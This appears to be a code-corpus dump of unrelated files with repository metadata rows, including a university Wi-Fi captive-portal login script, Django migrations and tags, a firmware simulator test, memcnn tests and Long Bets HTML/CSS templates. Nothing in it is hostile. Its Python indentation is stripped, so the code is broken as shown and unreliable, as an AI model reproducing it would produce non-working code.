def abort(self):
self.state = self.ABORTED
for transaction in self.transactions.all():
transaction.mark_as_rejected()
self.save(update_fields=('state', 'updated_at'))
def commit(self):
self.state = self.COMMITED
for transaction in self.transactions.processing():
transaction.mark_as_secured()
self.save(update_fields=('state', 'updated_at'))
| 35.85782 | 118 | 0.648163 | 824 | 7,566 | 5.75 | 0.214806 | 0.027438 | 0.023639 | 0.025116 | 0.272478 | 0.244829 | 0.172225 | 0.147953 | 0.107007 | 0.048544 | 0 | 0.002257 | 0.238699 | 7,566 | 210 | 119 | 36.028571 | 0.820313 | 0.022733 | 0 | 0.171779 | 0 | 0 | 0.139891 | 0.003664 | 0 | 0 | 0 | 0 | 0 | 1 | 0.159509 | false | 0 | 0.055215 | 0.079755 | 0.558282 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
82f8c42e4b7f145f7c76d62522e5c2d2fdd59996 | 8,992 | py | Python | puwifi.py | SaicharanKandukuri/logmein | 9946488fb61093bf2394254da056d2ebd290e83a | [
"MIT"
] | 4 | 2021-12-01T12:07:49.000Z | 2022-03-16T15:11:57.000Z | puwifi.py | SaicharanKandukuri/puwifi | 9946488fb61093bf2394254da056d2ebd290e83a | [
"MIT"
] | 10 | 2021-12-01T11:41:04.000Z | 2022-03-16T16:12:36.000Z | puwifi.py | SaicharanKandukuri/logmein | 9946488fb61093bf2394254da056d2ebd290e83a | [
"MIT"
] | 2 | 2021-11-29T16:16:22.000Z | 2021-11-30T05:06:05.000Z | import optparse
import sys
from sys import getsizeof
import logging
from signal import signal, SIGINT
import time
import requests
# MIT License
#
# Copyright (c) 2022 SaicharanKandukuri
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from rich.logging import RichHandler
FORMAT = "%(message)s"
logging.basicConfig(
level="NOTSET",
format=FORMAT,
datefmt="[%X]",
handlers=[RichHandler()]
)
logging.disable('DEBUG')
log = logging.getLogger("rich")
class WifiUtils:
"""class for wifi utils"""
def __init__(self, username, password, host, port):
self.username = username
self.password = password
self.host = host
self.port = port
@classmethod
def request(cls,
method,
username,
password,
host, port,
timeout) -> list:
"""request method: sends request to wifi host
Args:
method (str): interaction method "login.xml" or "logout.xml". Defaults to "login.xml".
username (str): username assigned by parul university to access wifi
password (str): password assigned by parul university to access wifi
host (str): hostname of the parul university wifi hotspot/routers Defaults to "
port (str): port to send login request. Defaults to "8090".
timeout (int): request timeout. Defaults to 10.
Returns:
list
server_request status[true|false]
response(xml data returned form server)
status_code(web request status code)
"""
url = ("http://"+host+":"+port+"/"+method)
body = ("mode=191&username=" + username + "&password=" + password +
"&a=1630404423764&producttype=0"
)
headers = {
"Host": "http://" + host + ":" + port + "",
"Content-Length": str(getsizeof(body)),
"User-Agent": "Chrome/92.0.4515.159 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Accept": "*/*",
"Origin": "http://" + host + ":" + port,
"Referer": "http://" + host + ":" + port + "/",
"Accept-Encoding": "gzip defalte",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close",
}
body_array = bytearray(body, 'utf-8')
req = requests.post(url,
data=body_array,
headers=headers,
timeout=timeout,
verify=False
)
return [(req.status_code == 200), req.text, req.status_code]
def login(self,
username,
password,
host,
port="8090",
method="login.xml",
timeout=10) -> list:
"""login: uses request method to send login web request with credentials to wifi host
Args:
username (str): username assigned by parul university to access wifi
password (str): password assigned by parul university to access wifi
host (str): hostname of the parul university wifi hotspot/routers
Defaults to "10.0.0.11"
port (str, optional): port to send login request. Defaults to "8090".
method (str, optional): interaction method
"login.xml" or "logout.xml". Defaults to "login.xml".
timeout (int, optional): request timeout. Defaults to 10.
"""
return self.request(method, username, password, host, port, timeout)
def logout(self,
username,
password,
host,
port="8090",
method="logout.xml",
timeout=10) -> list:
"""logout: uses request method to send logout web request with credentials to wifi host
Args:
username (str): username assigned by parul university to access wifi
password (str): password assigned by parul university to access wifi
host (str): hostname of the parul university wifi hotspot/routers
Defaults to "10.0.0.11"
port (str, optional): port to send login request. Defaults to "8090".
method (str, optional): interaction method
"login.xml" or "logout.xml". Defaults to "logout.xml".
timeout (int, optional): request timeout. Defaults to 10.
"""
return self.request(method, username, password, host, port, timeout)
# def get_xml_msg(xml): # for later (●'◡'●)
# return Et.parse(xml).getroot()[1]
def grey_print(_string):
"""prints outs grey text
Args:
_string (str)
"""
print(f"\033[90m{_string}\033[0m")
def connection_to(url, timeout=10):
"""checks if connection to url is available"""
try:
requests.get(url, timeout=timeout)
return True
except (requests.ConnectionError,
requests.Timeout):
return False
def keep_alive(username, password, host, port):
"""keeps connection alive to wifi host"""
while True:
if connection_to("http://10.0.0.11:8090/"):
log.info("connection to router \"available\"")
else:
log.critical("connection to router \"unavailable\"")
if connection_to("https://google.com"):
log.info("Connected to the internet")
else:
log.warning("Not connected to the internet")
log.info("Tying to login back")
try:
log.info(WifiUtils.login(username, password, host, port))
except (requests.ConnectionError,
requests.Timeout):
log.critical(
"Connection error: \"UNSTABLE CONNECTION TO HOST\"")
time.sleep(5)
def exit_handler(_signal, frame):
"""captures keyboard interrupts and kill signals & exits with messesage"""
log.warning('SIGINT or CTRL-C detected. Exiting gracefully')
grey_print("signal:"+str(_signal))
grey_print("frame:"+str(frame))
sys.exit(0)
if __name__ == '__main__':
signal(SIGINT, exit_handler)
parser = optparse.OptionParser()
parser.add_option('-u', '--username', dest='username',
help='username to login/logout with parul university wifi service')
parser.add_option('-p', '--password', dest='password',
help='password to login/logout with parul university wifi service')
parser.add_option('-H', '--host', dest='host',
default='10.0.0.11', type=str)
parser.add_option('-P', '--port', dest='port',
default='8090', type=str)
parser.add_option('-k', '--keep-alive', action='store_true',
help='keep connecting to wifi when it gets signed out', default=False)
parser.add_option('-o', '--logout', action='store_true',
help='logout from wifi', default=False)
parser.add_option('-l', '--login', action='store_true',
help='login to wifi', default=False)
options, args = parser.parse_args()
WifiUtils = WifiUtils(
options.username, options.password, options.host, options.port)
if options.login:
log.info("=> login <=")
log.info(WifiUtils.login(options.username,
options.password,
options.host, options.port,
))
sys.exit(0)
if options.logout:
log.info("=> logout <=")
log.info(WifiUtils.logout(options.username,
options.password,
options.host, options.port,
))
sys.exit(0)
if options.keep_alive:
log.info("=> keep alive <=")
keep_alive(options.username,
options.password,
options.host, options.port,
)
| 36.702041 | 98 | 0.585187 | 1,026 | 8,992 | 5.08577 | 0.292398 | 0.018398 | 0.030663 | 0.036796 | 0.364699 | 0.309889 | 0.302798 | 0.288233 | 0.261403 | 0.261403 | 0 | 0.019197 | 0.304827 | 8,992 | 244 | 99 | 36.852459 | 0.81507 | 0.349867 | 0 | 0.232394 | 0 | 0 | 0.18048 | 0.015812 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056338 | false | 0.112676 | 0.056338 | 0 | 0.15493 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
82fd258b0956b6fcb923493f7bbd91bb6546c5c0 | 335 | py | Python | bugex_online/bugex_webapp/templatetags/custom_tags.py | fkleon/bugex-online | bf0687ff6167d66980eb44adcdb14e8fc65d9504 | [
"Apache-2.0"
] | null | null | null | bugex_online/bugex_webapp/templatetags/custom_tags.py | fkleon/bugex-online | bf0687ff6167d66980eb44adcdb14e8fc65d9504 | [
"Apache-2.0"
] | 7 | 2020-06-30T23:15:12.000Z | 2022-02-01T00:57:38.000Z | bugex_online/bugex_webapp/templatetags/custom_tags.py | fkleon/bugex-online | bf0687ff6167d66980eb44adcdb14e8fc65d9504 | [
"Apache-2.0"
] | null | null | null | from django import template
from django.conf import settings
register = template.Library()
@register.simple_tag
def settings_value(name):
"""
This Tag allows to access values from the configuration file in the templates.
"""
try:
return settings.__getattr__(name)
except AttributeError:
return ""
| 22.333333 | 82 | 0.707463 | 40 | 335 | 5.775 | 0.7 | 0.08658 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.220896 | 335 | 14 | 83 | 23.928571 | 0.885057 | 0.232836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
82ff896e3d6c189f07e2be0a44d052ed10938137 | 330 | py | Python | producto/migrations/0004_auto_20180611_2350.py | JohanVasquez/crud-venta-libre | 557f82b5d88c42480020a65cc6034348ff20efce | [
"MIT"
] | null | null | null | producto/migrations/0004_auto_20180611_2350.py | JohanVasquez/crud-venta-libre | 557f82b5d88c42480020a65cc6034348ff20efce | [
"MIT"
] | null | null | null | producto/migrations/0004_auto_20180611_2350.py | JohanVasquez/crud-venta-libre | 557f82b5d88c42480020a65cc6034348ff20efce | [
"MIT"
] | null | null | null | # Generated by Django 2.0.6 on 2018-06-11 23:50
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('producto', '0003_auto_20180611_2248'),
]
operations = [
migrations.RenameModel(
old_name='Venta',
new_name='Ventas',
),
]
| 18.333333 | 48 | 0.593939 | 36 | 330 | 5.305556 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133047 | 0.293939 | 330 | 17 | 49 | 19.411765 | 0.686695 | 0.136364 | 0 | 0 | 1 | 0 | 0.14841 | 0.081272 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d20192a90dd1bce99c4dd2075229189ba55979b5 | 6,481 | py | Python | src/test/testcases/testPSUReadSbeMem.py | open-power/sbe | 0208243c5bbd68fa36464397fa46a2940c827edf | [
"Apache-2.0"
] | 9 | 2017-03-21T08:34:24.000Z | 2022-01-25T06:00:51.000Z | src/test/testcases/testPSUReadSbeMem.py | sumant8098/sbe | 0208243c5bbd68fa36464397fa46a2940c827edf | [
"Apache-2.0"
] | 17 | 2016-11-04T00:46:43.000Z | 2021-04-13T16:31:11.000Z | src/test/testcases/testPSUReadSbeMem.py | sumant8098/sbe | 0208243c5bbd68fa36464397fa46a2940c827edf | [
"Apache-2.0"
] | 17 | 2017-03-24T11:52:56.000Z | 2022-01-25T06:00:49.000Z | # IBM_PROLOG_BEGIN_TAG
# This is an automatically generated prolog.
#
# $Source: src/test/testcases/testPSUReadSbeMem.py $
#
# OpenPOWER sbe Project
#
# Contributors Listed Below - COPYRIGHT 2017,2019
# [+] International Business Machines Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# IBM_PROLOG_END_TAG
from __future__ import print_function
import sys
sys.path.append("targets/p9_nimbus/sbeTest" )
sys.path.append("targets/p9_axone/sbeTest" )
import testPSUUtil
import testRegistry as reg
import testUtil
import testMemUtil
#-------------------------------
# This is a Test Expected Data
#-------------------------------
def getdoubleword(dataInInt):
hex_string = '0'*(16-len(str(hex(dataInInt))[:18][2:])) + str(hex(dataInInt))[:18][2:]
return hex_string
def readSeeprom(offset, size, destAddr, primStatus, secStatus):
'''
#------------------------------------------------------------------------------------------------------------------------------
# SBE side test data -
#------------------------------------------------------------------------------------------------------------------------------
'''
sbe_test_data = (
#-----------------------------------------------------------------------------------------------------
# OP Reg ValueToWrite size Test Expected Data Description
#-----------------------------------------------------------------------------------------------------
# FFDC Size, Pass CMD Size
["write", reg.REG_MBOX0, "0000010000F0D703", 8, "None", "Writing to MBOX0 address"],
# seeprom offset, Size
["write", reg.REG_MBOX1, getdoubleword((offset<<32)+size), 8, "None", "Writing to MBOX1 address"],
# response Addr
["write", reg.REG_MBOX2, getdoubleword(destAddr), 8, "None", "Writing to MBOX2 address"],
["write", reg.PSU_SBE_DOORBELL_REG_WO_OR, "8000000000000000", 8, "None", "Update SBE Doorbell register to interrupt SBE"],
)
'''
#---------------------
# Host side test data - SUCCESS
#---------------------
'''
host_test_data_success = (
#----------------------------------------------------------------------------------------------------------------
# OP Reg ValueToWrite size Test Expected Data Description
#----------------------------------------------------------------------------------------------------------------
["read", reg.REG_MBOX4, "0", 8, getdoubleword((primStatus<<48)+(secStatus<<32)+0xF0D703), "Reading Host MBOX4 data to Validate"],
)
'''
#-----------------------------------------------------------------------
# Do not modify - Used to simulate interrupt on Ringing Doorbell on Host
#-----------------------------------------------------------------------
'''
host_polling_data = (
#----------------------------------------------------------------------------------------------------------------
# OP Reg ValueToWrite size Test Expected Data Description
#----------------------------------------------------------------------------------------------------------------
["read", reg.PSU_HOST_DOORBELL_REG_WO_OR, "0", 8, "8000000000000000", "Reading Host Doorbell for Interrupt Bit0"],
)
# Run Simics initially
testUtil.runCycles( 10000000 );
# Intialize the class obj instances
regObj = testPSUUtil.registry() # Registry obj def for operation
# HOST->SBE data set execution
regObj.ExecuteTestOp( testPSUUtil.simSbeObj, sbe_test_data )
print("\n Poll on Host side for INTR ...\n")
#Poll on HOST DoorBell Register for interrupt
regObj.pollingOn( testPSUUtil.simSbeObj, host_polling_data, 5 )
#SBE->HOST data set execution
regObj.ExecuteTestOp( testPSUUtil.simSbeObj, host_test_data_success )
#-------------------------
# Main Function
#-------------------------
def main():
# Run Simics initially
testUtil.runCycles( 10000000 );
print("\n Execute SBE Test - Read SBE Mem\n")
'''
Test Case 1
'''
readSeeprom(0, 128, 0x08000000, 0, 0)
print("SUCCESS: read seeprom valid")
# Read data from cache and verify its contents
# seeprom header
seepprmHdr = 'XIP SEPM'
#read from cache
readData = testMemUtil.getmem(0x08000000, 0x80, 0x02)
for byte in range(len(seepprmHdr)):
if( ord(seepprmHdr[byte]) != readData[byte ]):
print("Data mismtach at: ", byte)
print(" expected: ", ord(seepprmHdr[byte]))
print(" Actual: ", readData[byte])
raise Exception('data mistmach');
'''
Test Case 2
'''
readSeeprom(0x38CA0, 0x180, 0x8973780, 0, 0)
print("SUCCESS: read seeprom HB testcase")
'''
Test Case 3
'''
readSeeprom(0x0, 0x40, 0x08000000, 0x03, 0x19)
print("SUCCESS: read seeprom size not aligned")
'''
Test Case 4
'''
readSeeprom(0x3fe80, 0x180, 0x08000000, 0x03, 0x19)
print("SUCCESS: read seeprom size exceeded")
'''
Test Case 5
'''
readSeeprom(0x7, 0x40, 0x08000000, 0x03, 0x19)
print("SUCCESS: read seeprom offset not aligned")
if __name__ == "__main__":
if testUtil.getMachineName() == "axone":
try:
main()
except:
print ( "\nTest Suite completed with error(s)" )
testUtil.collectFFDC()
raise()
print ( "\nTest Suite completed with no errors" )
else:
main()
if err:
print ( "\nTest Suite completed with error(s)" )
#sys.exit(1)
else:
print ( "\nTest Suite completed with no errors" )
#sys.exit(0);
| 38.123529 | 144 | 0.494214 | 606 | 6,481 | 5.20132 | 0.39769 | 0.019036 | 0.025381 | 0.036485 | 0.244607 | 0.219226 | 0.176079 | 0.096764 | 0.052665 | 0.034898 | 0 | 0.046821 | 0.235457 | 6,481 | 169 | 145 | 38.349112 | 0.589304 | 0.405339 | 0 | 0.151515 | 1 | 0 | 0.242948 | 0.014862 | 0 | 0 | 0.041553 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.151515 | 0.227273 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d20425193c1b51cfe42ea596643380c8747b1847 | 1,275 | py | Python | memcnn/experiment/tests/test_factory.py | classner/memcnn | 107ea40945b2b0d312d05cab5b78633e5f977a52 | [
"MIT"
] | 224 | 2018-03-03T02:46:54.000Z | 2022-02-12T14:33:56.000Z | memcnn/experiment/tests/test_factory.py | classner/memcnn | 107ea40945b2b0d312d05cab5b78633e5f977a52 | [
"MIT"
] | 62 | 2018-04-28T01:25:14.000Z | 2021-11-25T13:20:57.000Z | memcnn/experiment/tests/test_factory.py | classner/memcnn | 107ea40945b2b0d312d05cab5b78633e5f977a52 | [
"MIT"
] | 25 | 2018-04-20T18:08:12.000Z | 2022-02-03T22:13:44.000Z | import pytest
import os
import memcnn.experiment.factory
from memcnn.config import Config
def test_get_attr_from_module():
a = memcnn.experiment.factory.get_attr_from_module('memcnn.experiment.factory.get_attr_from_module')
assert a is memcnn.experiment.factory.get_attr_from_module
def test_load_experiment_config():
cfg_fname = os.path.join(Config.get_dir(), 'experiments.json')
memcnn.experiment.factory.load_experiment_config(cfg_fname, ['cifar10', 'resnet110'])
@pytest.mark.skip(reason="Covered more efficiently by test_train.test_run_experiment")
def test_experiment_config_parser(tmp_path):
tmp_data_dir = tmp_path / "tmpdata"
cfg_fname = os.path.join(Config.get_dir(), 'experiments.json')
cfg = memcnn.experiment.factory.load_experiment_config(cfg_fname, ['cifar10', 'resnet110'])
memcnn.experiment.factory.experiment_config_parser(cfg, str(tmp_data_dir), workers=None)
def test_circular_dependency(tmp_path):
p = str(tmp_path / "circular.json")
content = u'{ "circ": { "base": "circ" } }'
with open(p, 'w') as fh:
fh.write(content)
with open(p, 'r') as fh:
assert fh.read() == content
with pytest.raises(RuntimeError):
memcnn.experiment.factory.load_experiment_config(p, ['circ'])
| 37.5 | 104 | 0.741176 | 177 | 1,275 | 5.079096 | 0.333333 | 0.14238 | 0.204672 | 0.07564 | 0.452725 | 0.430478 | 0.382647 | 0.249166 | 0.249166 | 0.249166 | 0 | 0.009058 | 0.134118 | 1,275 | 33 | 105 | 38.636364 | 0.805254 | 0 | 0 | 0.08 | 0 | 0 | 0.175686 | 0.059608 | 0 | 0 | 0 | 0 | 0.08 | 1 | 0.16 | false | 0 | 0.16 | 0 | 0.32 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d205e00637b9718f14c4962c0430f40c178683e5 | 266 | py | Python | src/guildapi.py | nsde/discord-guildapi | b1303423e74c1370498e594429f3bf4aeae4ee95 | [
"MIT"
] | null | null | null | src/guildapi.py | nsde/discord-guildapi | b1303423e74c1370498e594429f3bf4aeae4ee95 | [
"MIT"
] | null | null | null | src/guildapi.py | nsde/discord-guildapi | b1303423e74c1370498e594429f3bf4aeae4ee95 | [
"MIT"
] | null | null | null | import requests
import json
def getguild(guild_id):
guild_id = str(guild_id)
http_response = requests.get(f'https://discord.com/api/guilds/{guild_id}/widget.json')
response_data = http_response.json()
data = json.dumps(response_data)
return data | 29.555556 | 90 | 0.733083 | 39 | 266 | 4.794872 | 0.538462 | 0.149733 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150376 | 266 | 9 | 91 | 29.555556 | 0.827434 | 0 | 0 | 0 | 0 | 0 | 0.198502 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d2066abfbaca62c1d5be55ef5d80f560df075d0a | 409 | py | Python | smarthome/smarthomeproj/server/migrations/0011_auto_20210122_0256.py | nunocaseiro/smarthome-server-django | 711db6ff360061d861d9985264f753e0f7846327 | [
"Apache-2.0"
] | null | null | null | smarthome/smarthomeproj/server/migrations/0011_auto_20210122_0256.py | nunocaseiro/smarthome-server-django | 711db6ff360061d861d9985264f753e0f7846327 | [
"Apache-2.0"
] | null | null | null | smarthome/smarthomeproj/server/migrations/0011_auto_20210122_0256.py | nunocaseiro/smarthome-server-django | 711db6ff360061d861d9985264f753e0f7846327 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.3 on 2021-01-22 02:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('server', '0010_auto_20210122_0054'),
]
operations = [
migrations.AlterField(
model_name='sensorvalue',
name='value',
field=models.DecimalField(decimal_places=2, max_digits=6),
),
]
| 21.526316 | 70 | 0.613692 | 45 | 409 | 5.444444 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0.273839 | 409 | 18 | 71 | 22.722222 | 0.713805 | 0.110024 | 0 | 0 | 1 | 0 | 0.124309 | 0.063536 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d20acbdc55dd2187f4e70d6f0f36211cc6ddf2d9 | 9,347 | py | Python | bets-templates.py | longnow/longview | 9345faacec64f427eab43790abc165af6a572e3d | [
"BSD-2-Clause"
] | 82 | 2015-01-23T04:20:31.000Z | 2022-02-18T22:33:53.000Z | bets-templates.py | longnow/longview | 9345faacec64f427eab43790abc165af6a572e3d | [
"BSD-2-Clause"
] | 2 | 2015-03-27T22:24:46.000Z | 2017-02-20T08:19:12.000Z | bets-templates.py | longnow/longview | 9345faacec64f427eab43790abc165af6a572e3d | [
"BSD-2-Clause"
] | 7 | 2015-06-04T20:37:02.000Z | 2021-03-10T02:41:08.000Z | # Copyright (c) 2004, The Long Now Foundation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# HTML template substitutions
#
# %n - nodeId (aka item number)
# %t - title
# %d - date string
# %1 [...] - positional arguments
# The HTML template used for a popup.
popupTemplate = """
<div class="node" id="node%n" onmouseout="javascript:hideNode('%n')">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td class="exp">
BET<br><span class="txt">%n</span></td>
<td class="exp" align="right">
%d
</td>
</tr>
</table>
<div class="txt-sm">
%1</div>
<table cellpadding="3" cellspacing="0" border="0" width="100%">
<tr>
<td class="exp" align="right">
AGREE
</td>
<td class="txt" align="left">
%2
</td>
</tr>
<tr>
<td class="exp" align="right">
DISAGREE
</td>
<td class="txt" align="left">
%3
</td>
</tr>
<tr>
<td class="exp" align="right">
STAKES
</td>
<td class="txt" align="left">
%4
</td>
</tr>
</table>
</div>
"""
notifyTemplate = """
<div class="node" id="node%n" onmouseout="javascript:hideNode('%n')">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td class="exp">
BET<br><span class="txt">%1</span></td>
<td class="exp" align="right">
REMEMBER AND REMIND
</td>
</tr>
</table>
<div class="txt-sm">
%2</div>
<table cellpadding="3" cellspacing="0" border="0" width="100%">
<tr>
<td class="exp" align="center">
%3
</td>
</tr>
</table>
</div>
"""
# this string gets written out in its entirety to styles.css
stylesheets = """
/* for the whole page, unless overridden */
body {
padding: 0;
margin: 0;
background-image: url("./img-static/bg.jpg");
}
/* Long Bets specific styles */
.exp {
font-size: 11px;
font-family: Verdana, Helvetica, sans-serif;
}
.txt-lg {
font-size: 16px;
font-family: Georgia, Times, serif;
}
.txt {
font-size: 14px;
font-family: Georgia, Times, serif;
}
.txt-sm {
font-size: 11px;
font-family: Georgia, Times, serif;
}
.txt-lt {
font-size: 14px;
font-family: Georgia, Times, serif;
color: #666666;
}
.node .txt-sm {
padding: 5px 0;
font-size: 12px;
}
.key {
width: 664px;
margin: 10px 0;
border: #ccc 1px solid;
}
.key td {
padding: 1px;
font-size: 11px;
width: 50%;
font-family: Verdana, Helvetica, sans-serif;
text-align: center;
}
/* links that have not been visited */
a:link {
color: #930;
text-decoration: none;
}
/* links that have already been visited */
a:visited {
color: #930;
text-decoration: none;
}
/* applied to a link when the cursor is hovering over it */
a:hover {
color: #c63;
text-decoration: underline;
}
/* the table at the very top of the page containing the logo image */
.logotable {
width: 100%; /* percent of the browser window occupied by the table */
margin: 0px;
padding: 0px;
}
/* the table data cell which contains the logo image */
.logo {
text-align: right;
background-color: #000;
border-bottom: 1px solid #996;
}
/* the table containing the title and navbar */
.titleandnav {
width: 100%; /* percent of the browser window occupied by the table */
}
/* the title cell itself */
.titlecell {
padding: 6px 10px; /* first value: top & bottom; second: left & right */
font-family: verdana, helvetica, arial, sans-serif; /* in order of */
/* desirability */
font-size: 16px;
border-top: 1px solid #996;
border-bottom: 1px solid #996;
color: #666;
}
/* the table cell which holds the navigation bar & surrounding whitespace */
.navcell {
text-align: center;
vertical-align: middle;
padding-left: 15px;
font-family: verdana, helvetica, arial, sans-serif; /* in order of */
/* desirability */
font-size: 10px;
color: #666;
}
/* table which holds the navigation bar & horizontal whitespace, but no
* vertical whitespace */
.navtable {
margin-left: auto;
margin-right: auto;
}
/* the dates on both ends of the navigation bar */
.navlabel {
font-family: verdana, helvetica, arial, sans-serif; /* in order of */
/* desirability */
font-size: 10px;
padding: 4px;
}
/* table cell that holds the "Long View Powered" image */
.power {
padding-left: 15px;
padding-right: 5px;
text-align: right;
}
/* row of dates labeling the X-axis of the timeline, at the top */
.ytabletop {
border-bottom: 1px dotted #996;
}
/* cell containing an individual date label on the X-axis of the timeline */
.ycell {
text-align: center;
vertical-align: top;
padding: 0;
font-family: verdana, helvetica, arial, sans-serif; /* in order of */
/* desirability */
font-size: 10px;
}
/* row of dates labeling the X-axis of the timeline, at the bottom */
.ytablebottom {
border-top: 1px dotted #996;
border-bottom: 1px solid #996;
}
/* table cell containing "Past", "Now", and "Future" at the top of the */
/* timeline*/
.pastnowcell {
text-align: right;
padding: 0;
}
/* the table containing the body of the timeline */
#datatable {
border-top: 1px #ddd solid;
border-right: 1px #ddd solid;
background-image: url('./img-generated/timeline-bg.png');
}
/* the background of each timeline bar */
.data {
padding-top: 1px;
padding-bottom: 1px;
background-position: 200px;
